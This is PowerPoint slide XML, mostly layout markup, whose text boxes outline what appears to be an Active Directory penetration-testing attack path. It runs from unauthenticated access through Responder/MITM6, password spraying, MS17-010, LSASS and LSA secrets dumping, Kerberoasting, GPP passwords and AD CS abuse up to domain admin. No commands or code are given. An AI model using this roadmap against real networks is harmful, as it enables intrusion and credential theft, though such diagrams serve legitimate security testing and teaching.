        <p:spPr>
          <a:xfrm>
            <a:off x="4329439" y="3041275"/>
            <a:ext cx="165109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Password Spray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EB560-7F99-4C63-550B-C4F0F267082D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="2"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5154986" y="2710935"/>
            <a:ext cx="3078" cy="33034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D9D5001-DFBC-DDEE-F651-5699AD5D3409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8988388" y="3041275"/>
            <a:ext cx="3100529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DOMAIN USER CREDS/HASHES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8DE956-A814-C796-DE5C-A49788806E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715462" y="4182383"/>
            <a:ext cx="118814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MS17-010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6ADB69-F48F-134B-0A50-7524E023BDFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200943" y="4183119"/>
            <a:ext cx="199125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Local Admin Hashes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CD029E-E636-9200-D6F9-40734F5EDC32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8665255" y="4182383"/>
            <a:ext cx="162313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err="1"/>
              <a:t>Secretsdump.py</a:t>
            </a:r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1BB8743-6A24-0D17-102E-144C6D9D3142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 flipV="1">
            <a:off x="8192194" y="4367049"/>
            <a:ext cx="473061" cy="7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8DA1356-3FE5-A258-F3F2-B66D0D7F40A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592788" y="5414693"/>
            <a:ext cx="15573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Web Port Scan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C447A6-976E-97C7-01F0-02EAE0B9D241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2580360" y="5276193"/>
            <a:ext cx="233429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Hardcoded Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Open Authentication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FF1F29-D38F-E810-3075-3C43D105E368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="42" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4914653" y="5599358"/>
            <a:ext cx="424337" cy="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69FBFFF-7AA4-6C1C-DCDE-AA58EEF36490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5338990" y="4882054"/>
            <a:ext cx="0" cy="71730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FB83A4-3F70-DF51-E5B6-26C07C49E519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="231228" y="4866290"/>
            <a:ext cx="510776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5BEB1C-3E1B-1695-E9DC-139972506AE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="229784" y="703291"/>
            <a:ext cx="0" cy="416299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0FA8CBD-AC77-FE55-094D-1175420A6E4C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29784" y="689163"/>
            <a:ext cx="50594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5D1238-5287-1E1C-00CF-67402645AC68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1916095" y="94595"/>
            <a:ext cx="212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UNAUTHENTICATED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A3AE48F9-61E1-3660-4BCF-B134A46DBA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7280818" y="1518371"/>
            <a:ext cx="2352112" cy="106302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DF9F8272-B20F-ED23-F498-5D7B66BF2B77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="3"/>
            <a:endCxn id="36" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10288392" y="3410607"/>
            <a:ext cx="250261" cy="956442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3845809-16E8-DB31-584D-EAD7E51A261C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="41" idx="3"/>
            <a:endCxn id="42" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2150137" y="5599359"/>
            <a:ext cx="430223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02C65143-A8CC-C3FB-5E56-5AADE419090D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="2"/>
            <a:endCxn id="36" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9105162" y="1607784"/>
            <a:ext cx="1283108" cy="1583874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6049A7-26E3-2975-94F9-1103012C0290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6106512" y="0"/>
            <a:ext cx="0" cy="685800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D36ACD6-2821-9E9F-1111-255E4CFAC398}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8277669" y="94595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AUTHENTICATED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28B767E-6FB1-3BEE-C96E-5FE5CBB70F23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1903608" y="4367049"/>
            <a:ext cx="4297335" cy="7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A135050-C082-2D3B-DDA5-6A3C30985108}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5855788" y="703291"/>
            <a:ext cx="1352485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3A9E78C-49B8-6364-A0A5-CFC0CCC38BA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="34" idx="3"/>
            <a:endCxn id="36" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5980532" y="3225941"/>
            <a:ext cx="300785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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA94F06A-0133-3C7E-CEAC-A9590EA9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B05829-A86C-7319-8A3C-2694BC20B9A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735724" y="504497"/>
            <a:ext cx="196476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Responder/MITM6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4145559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wi F">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{179B8073-5093-AB42-E68C-F28F2670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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="9723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20145" y="6073830"/>
            <a:ext cx="4729626" cy="7655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4A0DE8-8509-D3B4-31F8-B621916774F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5528440" y="5101305"/>
            <a:ext cx="253944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0A00748-AA1C-B940-B4DF-B76668C0769D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="1"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5528442" y="4505210"/>
            <a:ext cx="2512674" cy="1359562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0DC821-74D2-3841-1C4C-B5446FC8DEED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6819882" y="189185"/>
            <a:ext cx="318869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DOMAIN USER CREDS/HASHES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206A54-215C-4E42-DD6D-A6F848EF5559}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063377" y="190654"/>
            <a:ext cx="317362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LOCAL ADMIN CREDS/HASHES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005D36-1CBF-1DA0-E8BC-6861BAB106E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607884" y="5864772"/>
            <a:ext cx="3841116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DOMAIN ADMIN/ENTERPRISE ADMIN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10C691-B8B2-7E81-D774-3C5BFD8F3DA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4137067" y="1082565"/>
            <a:ext cx="278274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SPRAY FOR LOCAL ADMIN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ACC01-C751-E440-1A03-B9A9D03A32E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937575" y="2746249"/>
            <a:ext cx="209223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LSA SECRETS DUMP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B1593-8825-1676-8183-94F5859FB5D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8161342" y="2729747"/>
            <a:ext cx="1430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LSASS DUMP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5BE831-6780-342C-A7C7-BFC2797E643D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1465342" y="2746249"/>
            <a:ext cx="2340705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SHARE DRIVE MINING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DAAEEDA4-8D99-7BA1-36F7-8F88426DB869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="3"/>
            <a:endCxn id="21" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6919816" y="1267231"/>
            <a:ext cx="1956626" cy="1462516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D37D6EFB-A53C-58D8-0E34-4E1A9EAAB9E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="16" idx="3"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4237003" y="375320"/>
            <a:ext cx="1291439" cy="707245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7E439B83-1D36-80EF-0550-31BD5BD5DE53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="15" idx="1"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5528442" y="373851"/>
            <a:ext cx="1291440" cy="708714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23E35DFB-200A-BCFD-1ABC-BCA96897CE22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="0"/>
            <a:endCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6105096" y="437116"/>
            <a:ext cx="2187732" cy="243053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42A1F7C7-A20E-5CAB-D987-A8A61DFF0511}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8414229" y="566767"/>
            <a:ext cx="1177313" cy="2355897"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -19417"/>
              <a:gd name="adj2" fmla="val 5391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E50193-A88B-DBAD-B13D-4EF2BCB9DD63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5528440" y="1451897"/>
            <a:ext cx="2" cy="12943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15BA350-4D2E-12C8-D91F-3A7EB8D7E785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="19" idx="1"/>
            <a:endCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2635695" y="1267231"/>
            <a:ext cx="1501372" cy="1479018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F211C3-F8E5-1149-4B73-EE1AD58B2F37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3806047" y="2914413"/>
            <a:ext cx="639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BC8770-C117-BA9A-6F03-0903F444D57A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4445876" y="1652383"/>
            <a:ext cx="0" cy="12620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D23DA1-88E4-3FFC-CD3B-06E418935F6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4445876" y="1652383"/>
            <a:ext cx="15378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6683663-E5F1-B646-F143-85F2B81ED796}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8161342" y="3724449"/>
            <a:ext cx="165878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BLOODHOUND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02724-873F-73DF-B605-A0D9CB16F433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9188385" y="5864771"/>
            <a:ext cx="150393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AD CS ABUSE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8FBFD9-2CD0-4F9F-302E-3E5621060FB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10596398" y="373850"/>
            <a:ext cx="0" cy="54909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19584-E7C4-BBD5-5382-7270E0E78A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10008575" y="373850"/>
            <a:ext cx="587823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56A2950-B804-AC91-3C11-A33A11EFEF12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041116" y="4320544"/>
            <a:ext cx="189923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GPP PASSWORDS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B894D1-5D9E-FF30-3C16-BA995E5A5915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8067886" y="4916639"/>
            <a:ext cx="184569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KERBEROASTING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5F434AB-D09E-63F1-CC2B-CB62EFE27734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9820129" y="3909115"/>
            <a:ext cx="776269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ADBDF0-10B7-797B-5426-45F691F85858}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9940354" y="4505210"/>
            <a:ext cx="656044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C7D149C-9E06-6B15-70B5-8BE25A13E59E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9913584" y="5101305"/>
            <a:ext cx="682814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D737F5A-1B6B-D051-3D3E-10DC91A744EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="1"/>
            <a:endCxn id="17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7449000" y="6049437"/>
            <a:ext cx="1739385" cy="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407D8B4-099F-2053-7F1A-D750CCCD9D22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7725104" y="4505210"/>
            <a:ext cx="316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F9EF366-C4BE-A532-E42E-BE889ACD96E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7725104" y="566767"/>
            <a:ext cx="0" cy="39466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B0FCC27-5484-2D8A-4E77-80224F94AB85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654579" y="3724449"/>
            <a:ext cx="237552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PASSWORD SPRAYING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1E2629B-003F-59A5-5AE4-26B27B93AC77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7029814" y="3909115"/>
            <a:ext cx="390331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57D5487-A2A1-2BDA-D8B6-A40991340940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3951890" y="3909115"/>
            <a:ext cx="702689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D6A8AF-8144-D0A4-AF71-7B1092EF2BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3951890" y="566767"/>
            <a:ext cx="0" cy="334234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5BA2AC-3E6B-1C66-0C75-8AF1D387D672}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7420145" y="566767"/>
            <a:ext cx="0" cy="334234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52BEFCE-4CF9-96F7-7BD5-39704D41220F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7898129" y="5101305"/>
            <a:ext cx="1697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8A0ED61-F871-EB5C-68E8-2EC88EDA5B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7898129" y="566767"/>
            <a:ext cx="0" cy="4534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D29EB34D-97C3-DD0E-903D-9F5E89B899F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="23" idx="2"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="1654861" y="4096414"/>
            <a:ext cx="2933857" cy="972189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19AB7306-0B7B-BB81-9B4E-D55A4FD7D8B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4519449" y="2930914"/>
            <a:ext cx="418126" cy="2933857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47FDD99D-37D0-939E-BD84-E5AF5558A6E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7198962" y="2914413"/>
            <a:ext cx="962380" cy="2950358"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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800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727382" y="277127"/>
            <a:ext cx="361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CONTACT US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832413" y="5347233"/>
            <a:ext cx="8527173" cy="1380141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4C206BB1-53BD-F1F6-9EEA-AAD32EAD5030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2231346" y="2411415"/>
            <a:ext cx="1154112" cy="1154112"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 208 w 415"/>
              <a:gd name="T1" fmla="*/ 414 h 416"/>
              <a:gd name="T2" fmla="*/ 1 w 415"/>
              <a:gd name="T3" fmla="*/ 207 h 416"/>
              <a:gd name="T4" fmla="*/ 208 w 415"/>
              <a:gd name="T5" fmla="*/ 0 h 416"/>
              <a:gd name="T6" fmla="*/ 415 w 415"/>
              <a:gd name="T7" fmla="*/ 207 h 416"/>
              <a:gd name="T8" fmla="*/ 208 w 415"/>
              <a:gd name="T9" fmla="*/ 414 h 416"/>
              <a:gd name="T10" fmla="*/ 210 w 415"/>
              <a:gd name="T11" fmla="*/ 174 h 416"/>
              <a:gd name="T12" fmla="*/ 110 w 415"/>
              <a:gd name="T13" fmla="*/ 122 h 416"/>
              <a:gd name="T14" fmla="*/ 122 w 415"/>
              <a:gd name="T15" fmla="*/ 189 h 416"/>
              <a:gd name="T16" fmla="*/ 103 w 415"/>
              <a:gd name="T17" fmla="*/ 184 h 416"/>
              <a:gd name="T18" fmla="*/ 139 w 415"/>
              <a:gd name="T19" fmla="*/ 233 h 416"/>
              <a:gd name="T20" fmla="*/ 122 w 415"/>
              <a:gd name="T21" fmla="*/ 234 h 416"/>
              <a:gd name="T22" fmla="*/ 120 w 415"/>
              <a:gd name="T23" fmla="*/ 237 h 416"/>
              <a:gd name="T24" fmla="*/ 140 w 415"/>
              <a:gd name="T25" fmla="*/ 258 h 416"/>
              <a:gd name="T26" fmla="*/ 167 w 415"/>
              <a:gd name="T27" fmla="*/ 270 h 416"/>
              <a:gd name="T28" fmla="*/ 134 w 415"/>
              <a:gd name="T29" fmla="*/ 285 h 416"/>
              <a:gd name="T30" fmla="*/ 99 w 415"/>
              <a:gd name="T31" fmla="*/ 292 h 416"/>
              <a:gd name="T32" fmla="*/ 238 w 415"/>
              <a:gd name="T33" fmla="*/ 294 h 416"/>
              <a:gd name="T34" fmla="*/ 313 w 415"/>
              <a:gd name="T35" fmla="*/ 170 h 416"/>
              <a:gd name="T36" fmla="*/ 319 w 415"/>
              <a:gd name="T37" fmla="*/ 157 h 416"/>
              <a:gd name="T38" fmla="*/ 335 w 415"/>
              <a:gd name="T39" fmla="*/ 140 h 416"/>
              <a:gd name="T40" fmla="*/ 334 w 415"/>
              <a:gd name="T41" fmla="*/ 139 h 416"/>
              <a:gd name="T42" fmla="*/ 311 w 415"/>
              <a:gd name="T43" fmla="*/ 144 h 416"/>
              <a:gd name="T44" fmla="*/ 330 w 415"/>
              <a:gd name="T45" fmla="*/ 120 h 416"/>
              <a:gd name="T46" fmla="*/ 328 w 415"/>
              <a:gd name="T47" fmla="*/ 118 h 416"/>
              <a:gd name="T48" fmla="*/ 321 w 415"/>
              <a:gd name="T49" fmla="*/ 122 h 416"/>
              <a:gd name="T50" fmla="*/ 288 w 415"/>
              <a:gd name="T51" fmla="*/ 120 h 416"/>
              <a:gd name="T52" fmla="*/ 221 w 415"/>
              <a:gd name="T53" fmla="*/ 136 h 416"/>
              <a:gd name="T54" fmla="*/ 210 w 415"/>
              <a:gd name="T55" fmla="*/ 174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5" h="416">
                <a:moveTo>
                  <a:pt x="208" y="414"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="95" y="416"/>
                  <a:pt x="0" y="321"/>
                  <a:pt x="1" y="207"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="95"/>
                  <a:pt x="91" y="0"/>
                  <a:pt x="208" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="324" y="0"/>
                  <a:pt x="415" y="92"/>
                  <a:pt x="415" y="207"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="415" y="324"/>
                  <a:pt x="319" y="415"/>
                  <a:pt x="208" y="414"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="210" y="174"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="171" y="171"/>
                  <a:pt x="138" y="153"/>
                  <a:pt x="110" y="122"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="148"/>
                  <a:pt x="104" y="169"/>
                  <a:pt x="122" y="189"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="187"/>
                  <a:pt x="110" y="186"/>
                  <a:pt x="103" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="208"/>
                  <a:pt x="118" y="223"/>
                  <a:pt x="139" y="233"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
